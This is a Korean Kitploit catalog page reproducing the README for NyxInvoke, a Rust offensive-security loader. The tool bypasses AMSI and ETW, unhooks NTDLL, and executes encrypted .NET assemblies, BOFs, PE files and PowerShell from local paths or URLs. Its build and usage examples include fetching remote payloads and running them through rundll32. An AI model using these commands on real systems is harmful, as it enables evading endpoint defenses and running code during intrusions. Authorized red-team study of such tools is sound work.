Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
NyxInvoke — NyxInvoke는 패치리스 AMSI 및 ETW 우회 기능과 듀얼 빌드 지원을 갖춘 .NET 어셈블리, PowerShell 및 BOF를 실행하기 위한 Rust CLI 도구입니다. | Kitploit
도구/GitHubGitHub/blacksnufkin/nyxinvoke
ExploitationIDS/IPS EvasionShellcodePost-ExploitationPenetration TestingCommand and ControlRed TeamingRemote Access ToolPayload Development
GitHubblacksnufkin/nyxinvoke

NyxInvoke

NyxInvoke는 패치리스 AMSI 및 ETW 우회 기능과 듀얼 빌드 지원을 갖춘 .NET 어셈블리, PowerShell 및 BOF를 실행하기 위한 Rust CLI 도구입니다.

2433011년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
저장소 보기
공유

NyxInvoke

NyxInvoke는 .NET 어셈블리, PowerShell 명령/스크립트, BOF(Beacon Object Files) 및 PE 파일을 실행하기 위한 다목적 Rust 기반 도구로, 내장된 Ntdll 언후킹, 패치리스 AMSI 및 ETW 우회 기능을 갖추고 있습니다. 독립 실행형 실행 파일 또는 DLL로 컴파일할 수 있습니다.

기능

  • .NET 어셈블리 실행
  • PowerShell 명령 또는 스크립트 실행
  • BOF(Beacon Object Files) 로드 및 실행
  • PE 파일(EXE) 로드 및 실행
  • 내장된 패치리스 AMSI(안티 멀웨어 스캔 인터페이스) 우회
  • 내장된 패치리스 ETW(Windows용 이벤트 추적) 우회
  • "PspCreateProcessNotifyRoutine" 콜백을 트리거하지 않고 NTDLL 언후킹 지원
  • AES 복호화를 통한 암호화된 페이로드 지원
  • 유연한 입력 옵션: 로컬 파일, URL, 또는 컴파일된 데이터
  • 이중 빌드 지원: 실행 파일 또는 DLL로 컴파일 가능

빌드

NyxInvoke는 실행 파일 또는 DLL로 빌드할 수 있습니다. 다음 명령을 사용하세요:

실행 파일

root@kitploit:~
cargo +nightly build --release --target=x86_64-pc-windows-msvc --features exe --bin NyxInvoke

DLL

root@kitploit:~
cargo +nightly build --release --target=x86_64-pc-windows-msvc --features dll --lib

컴파일된 CLR, BOF 또는 PE 데이터를 포함하려면 각 기능을 추가하세요:

root@kitploit:~
cargo +nightly build --release --target=x86_64-pc-windows-msvc --features=exe,compiled_clr,compiled_bof,compiled_pe --bin NyxInvoke

또는

root@kitploit:~
cargo +nightly build --release --target=x86_64-pc-windows-msvc --features=dll,compiled_clr,compiled_bof,compiled_pe --lib

사용법

실행 파일 모드

실행 파일은 세 가지 주요 작동 모드를 지원합니다:

  1. CLR 모드 (.NET 어셈블리 실행)
  2. PowerShell 모드
  3. BOF 모드 (Beacon Object File 실행)
  4. PE 모드 (PE 파일 실행)

일반 구문

root@kitploit:~
NyxInvoke.exe <mode> [OPTIONS]

여기서 <mode>는 clr, ps, bof 또는 pe 중 하나입니다.

DLL 모드

DLL로 컴파일된 경우, rundll32를 사용하여 NyxInvoke를 실행할 수 있습니다. 구문은 다음과 같습니다:

root@kitploit:~
rundll32.exe NyxInvoke.dll,NyxInvoke <mode> [OPTIONS]

모드별 옵션

  1. CLR 모드:
root@kitploit:~
CLR(공통 언어 런타임) 어셈블리 실행

사용법: NyxInvoke.exe clr [OPTIONS]

옵션:
  -a, --args <ARGS>...            어셈블리에 전달할 인수
  -b, --base <URL_OR_PATH>        리소스의 기본 URL 또는 경로
  -k, --key <KEY_FILE>            암호화 키 파일 경로
  -i, --iv <IV_FILE>              초기화 벡터(IV) 파일 경로
  -f, --assembly <ASSEMBLY_FILE>  실행할 암호화된 어셈블리 파일의 경로 또는 URL
  -u, --unencrypted               어셈블리가 암호화되지 않았는지 여부 (기본값은 암호화됨)
  -h, --help                      도움말 출력 ('--help'로 자세히 보기)

예시: NyxInvoke.exe clr --assembly payload.enc --key key.bin --iv iv.bin --args "arg1 arg2"
  1. BOF 모드:
root@kitploit:~
BOF(Beacon Object Files) 실행

사용법: NyxInvoke.exe bof [OPTIONS]

옵션:
  -a, --args <ARGS>...      BOF에 전달할 인수
  -b, --base <URL_OR_PATH>  리소스의 기본 URL 또는 경로
  -k, --key <KEY_FILE>      암호화 키 파일 경로
  -i, --iv <IV_FILE>        초기화 벡터(IV) 파일 경로
  -f, --bof <BOF_FILE>      실행할 암호화된 BOF 파일의 경로 또는 URL
  -u, --unencrypted         BOF가 암호화되지 않았는지 여부 (기본값은 암호화됨)
  -h, --help                도움말 출력 ('--help'로 자세히 보기)

예시: NyxInvoke.exe bof --bof payload.enc --key key.bin --iv iv.bin --args "arg1 arg2"
  1. PE 모드:
root@kitploit:~
PE(이식 가능한 실행 파일) 파일 실행

사용법: NyxInvoke.exe pe [OPTIONS]

옵션:
  -a, --args <ARGS>...      PE에 전달할 인수
  -b, --base <URL_OR_PATH>  리소스의 기본 URL 또는 경로
  -k, --key <KEY_FILE>      암호화 키 파일 경로
  -i, --iv <IV_FILE>        초기화 벡터(IV) 파일 경로
  -f, --pe <PE_FILE>        실행할 암호화된 PE 파일의 경로 또는 URL
  -u, --unencrypted         PE가 암호화되지 않았는지 여부 (기본값은 암호화됨)
  -h, --help                도움말 출력 ('--help'로 자세히 보기)

예시: NyxInvoke.exe pe --pe payload.enc --key key.bin --iv iv.bin --args "arg1 arg2"
  1. PowerShell 모드:
root@kitploit:~
PowerShell 명령 또는 스크립트 실행

사용법: NyxInvoke.exe ps [OPTIONS]

옵션:
  -c, --command <PS_COMMAND>  실행할 PowerShell 명령
  -s, --script <PS_SCRIPT>    실행할 PowerShell 스크립트의 경로 또는 URL
  -h, --help                  도움말 출력 ('--help'로 자세히 보기)

예시:
NyxInvoke.exe ps --command "Get-Process"
NyxInvoke.exe ps --script script.ps1

예시

실행 파일 모드

  1. CLR 모드 (원격 실행):

    root@kitploit:~
    NyxInvoke.exe clr --base https://example.com/resources --key clr_aes.key --iv clr_aes.iv --assembly clr_data.enc --args arg1 arg2
    
  2. PowerShell 모드 (스크립트 실행):

    root@kitploit:~
    NyxInvoke.exe ps --script C:\path\to\script.ps1
    
  3. BOF 모드 (로컬 실행):

    root@kitploit:~
    NyxInvoke.exe bof --key C:\path\to\bof_aes.key --iv C:\path\to\bof_aes.iv --bof C:\path\to\bof_data.enc --args "str=argument1" "int=42"
    
  4. PE 모드 (컴파일된 실행):

    root@kitploit:~
    NyxInvoke.exe pe --args arg1
    

DLL 모드

  1. CLR 모드 (원격 실행):

    root@kitploit:~
    rundll32.exe NyxInvoke.dll,NyxInvoke clr --base https://example.com/resources --key clr_aes.key --iv clr_aes.iv --assembly clr_data.enc --args arg1 arg2
    
  2. PowerShell 모드 (직접 명령 실행):

    root@kitploit:~
    rundll32.exe NyxInvoke.dll,NyxInvoke ps --command "Get-Process | Select-Object Name, ID"
    
  3. BOF 모드 (컴파일된 실행):

    root@kitploit:~
    rundll32.exe NyxInvoke.dll,NyxInvoke bof --args "str=argument1" "int=42"
    
  4. PE 모드 (로컬 실행, 암호화되지 않음):

    root@kitploit:~
    rundll32.exe NyxInvoke.dll,NyxInvoke pe -u --pe C:\path\to\pe.exe --args arg1 arg2
    

테스트 리소스

resources 디렉토리에서 NyxInvoke의 기능을 테스트하기 위한 여러 파일을 찾을 수 있습니다:

  1. 암호화된 CLR 어셈블리 (Seatbelt):

    • 파일: clr_data.enc
    • 설명: 시스템 정보 수집을 위한 C# 프로젝트인 Seatbelt 도구의 암호화된 버전입니다.
    • 사용 예시:
      root@kitploit:~
      NyxInvoke.exe clr --key resources/clr_aes.key --iv resources/clr_aes.iv --assembly resources/clr_data.enc --args AntiVirus
      
  2. 암호화된 BOF (디렉토리 목록):

    • 파일: bof_data.enc
    • 설명: 지정된 파일의 사용자 권한을 나열하는 암호화된 Beacon Object File입니다(와일드카드 지원).
    • 사용 예시:
      root@kitploit:~
      NyxInvoke.exe bof --key resources/bof_aes.key --iv resources/bof_aes.iv --bof resources/bof_data.enc --args "wstr=C:\Windows\system32\cmd.exe"
      
  3. 암호화된 PE (메시지 박스):

    • 파일: pe_data.enc
    • 설명: 메시지 박스를 표시하는 암호화된 PE 파일입니다.
    • 사용 예시:
      root@kitploit:~
      NyxInvoke.exe pe
      
  4. PowerShell (메시지 박스):

    • 파일: ps.ps1
    • 설명: 메시지 박스를 표시하는 PowerShell 스크립트입니다.
    • 사용 예시:
      root@kitploit:~
      NyxInvoke.exe ps -s http://example.com/ps.ps1
      

스크린샷

  • DLL 컴파일된 CLR 실행

Screenshot 2024-09-18 123147

  • EXE 원격 BOF 실행

Screenshot 2024-09-18 123410

  • DLL 컴파일된 EXE 실행

pe

  • DLL PowerShell 스크립트 실행

Screenshot 2024-09-18 123547

법적 고지

이 도구는 교육 및 승인된 테스트 목적으로만 사용됩니다. 어떤 환경에서 사용하기 전에 적절한 권한이 있는지 확인하세요.

크레딧

  • @yamakadi - clroxide 프로젝트
  • @hakaioffsec - coffee 프로젝트
도구 다운로드